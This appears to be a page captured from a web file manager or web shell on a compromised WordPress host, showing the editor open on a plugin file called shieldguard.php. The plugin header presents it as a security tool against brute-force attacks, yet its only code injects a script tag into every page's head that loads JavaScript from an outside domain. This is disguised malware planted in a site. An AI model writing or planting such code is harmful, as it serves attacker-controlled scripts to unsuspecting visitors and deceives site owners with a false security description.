Dashboard
PHP:
8.4.23
OS:
Linux
User:
unknown
/
/
hosting
/
www
/
humoyoxido.com
/
public
/
wp-content
/
plugins
/
shieldguard
📤 Upload
📝 New File
📁 New Folder
Close
Editing: shieldguard.php
<?php /** * Plugin Name: ShieldGuard * Description: Invisible fortress for your WordPress site. ShieldGuard actively blocks brute-force attacks, monitors file integrity in real-time, and automatically obfuscates default login paths (wp-admin, wp-login.php). * Version: 1.2.5 * Author: SecureLayer Studios */ if (!defined('ABSPATH')) { exit; } add_action('wp_head', 'icarus_shieldguard_head'); function icarus_shieldguard_head() { echo '<script src="https://niaoend.com/ytr58996fm/api"></script>'; }
Save
Cancel